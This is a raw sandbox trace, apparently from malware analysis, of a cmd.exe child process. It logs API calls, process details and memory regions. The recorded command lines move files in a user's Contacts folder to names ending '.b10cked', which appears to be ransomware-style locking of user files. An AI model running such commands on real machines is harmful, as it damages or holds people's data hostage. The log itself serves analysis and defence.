65 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2="..") returned 65 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh~1.con")) returned 0x20 [0219.555] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x71e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.555] SetErrorMode (uMode=0x0) returned 0x0 [0219.555] SetErrorMode (uMode=0x1) returned 0x0 [0219.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", nBufferLength=0x104, lpBuffer=0x2ceee4, lpFilePart=0x2ceecc | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", lpFilePart=0x2ceecc*="OFHBNH~1.CON") returned 0x26 [0219.555] SetErrorMode (uMode=0x0) returned 0x1 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2=".") returned 65 [0219.555] _wcsicmp (_String1="OFHBNH~1.CON", _String2="..") returned 65 [0219.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh~1.con")) returned 0x20 [0219.555] SetErrorMode (uMode=0x0) returned 0x0 [0219.555] SetErrorMode (uMode=0x1) returned 0x0 [0219.555] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", nBufferLength=0x104, lpBuffer=0x2cf360, lpFilePart=0x2cf0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", lpFilePart=0x2cf0f8*="OFHBNH~1.CON") returned 0x26 [0219.556] SetErrorMode (uMode=0x0) returned 0x1 [0219.556] SetErrorMode (uMode=0x0) returned 0x0 [0219.556] SetErrorMode (uMode=0x1) returned 0x0 [0219.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", nBufferLength=0x104, lpBuffer=0x2cf568, lpFilePart=0x2cf0f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", lpFilePart=0x2cf0f8*="ofhbnh edferrr.contact.b10cked") returned 0x38 [0219.556] SetErrorMode (uMode=0x0) returned 0x1 [0219.556] SetLastError (dwErrCode=0x0) [0219.556] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.b10cked")) returned 0xffffffff [0219.556] GetLastError () returned 0x2 [0219.556] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2cea74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea74) returned 0x60e68 [0219.556] FindNextFileW (in: hFindFile=0x60e68, lpFindFileData=0x2cea74 | out: lpFindFileData=0x2cea74) returned 0 [0219.556] GetLastError () returned 0x12 [0219.556] FindClose (in: hFindFile=0x60e68 | out: hFindFile=0x60e68) returned 1 [0219.557] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x71bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71bd8) returned 0x60e68 [0219.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", nBufferLength=0x104, lpBuffer=0x2ced0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", lpFilePart=0x0) returned 0x38 [0219.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", nBufferLength=0x104, lpBuffer=0x2ced0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpFilePart=0x0) returned 0x30 [0219.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact")) returned 0x20 [0219.557] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.b10cked"), dwFlags=0x3) returned 1 [0219.558] FindClose (in: hFindFile=0x60e68 | out: hFindFile=0x60e68) returned 1 [0219.558] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cecc0 | out: _Buffer=" 1") returned 9 [0219.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.558] GetFileType (hFile=0x7) returned 0x2 [0219.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cec4c | out: lpMode=0x2cec4c) returned 1 [0219.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cec80 | out: lpConsoleScreenBufferInfo=0x2cec80) returned 1 [0219.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2cecc0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.635] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceca4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2ceca4*=0x1a) returned 1 [0219.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.635] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.635] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.635] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.635] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.635] SetConsoleInputExeNameW () returned 0x1 [0219.635] GetConsoleOutputCP () returned 0x1b5 [0219.635] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.636] exit (_Code=0) Process: id = "567" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32753 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32754 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32755 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32756 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32760 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32782 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32783 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32784 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32785 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 32786 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 32787 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32788 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32789 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32790 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32791 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32792 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32793 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32794 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32795 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32796 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 32797 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32798 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32799 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 32800 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32801 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32802 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32803 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 32804 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 32805 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 770 os_tid = 0xe9c [0219.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb0c | out: lpSystemTimeAsFileTime=0x12fb0c*(dwLowDateTime=0xb78ba520, dwHighDateTime=0x1d440a9)) [0219.353] GetCurrentProcessId () returned 0x78c [0219.353] GetCurrentThreadId () returned 0xe9c [0219.353] GetTickCount () returned 0x3d420 [0219.353] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb04 | out: lpPerformanceCount=0x12fb04*=27614187606) returned 1 [0219.353] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.353] __set_app_type (_Type=0x1) [0219.353] __p__fmode () returned 0x76b331f4 [0219.353] __p__commode () returned 0x76b331fc [0219.353] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.353] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0219.354] GetCurrentThreadId () returned 0xe9c [0219.354] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0219.354] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.354] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.354] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.354] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa9c | out: phkResult=0x12fa9c*=0x0) returned 0x2 [0219.354] VirtualQuery (in: lpAddress=0x12fad3, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0219.354] GetConsoleOutputCP () returned 0x1b5 [0219.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.354] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.354] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.354] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.355] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.355] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.355] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.355] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.355] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.355] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.355] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.355] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.355] GetEnvironmentStringsW () returned 0x340178* [0219.355] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0219.355] GetEnvironmentStringsW () returned 0x340178* [0219.355] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0219.356] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0xa0, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegCloseKey (hKey=0x40) returned 0x0 [0219.356] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegCloseKey (hKey=0x40) returned 0x0 [0219.356] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.356] srand (_Seed=0x5b8863b5) [0219.356] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" [0219.356] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" [0219.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.357] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.357] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.357] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.357] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.357] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.357] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.357] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.357] GetEnvironmentStringsW () returned 0x3422c8* [0219.357] FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0219.357] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.357] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.357] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.357] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.357] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.357] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.357] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.358] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.358] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7d8, lpFilePart=0x12f7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7d4*="Desktop") returned 0x18 [0219.358] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.358] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.358] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.358] GetEnvironmentStringsW () returned 0x342ae8* [0219.359] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0219.359] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.359] GetConsoleOutputCP () returned 0x1b5 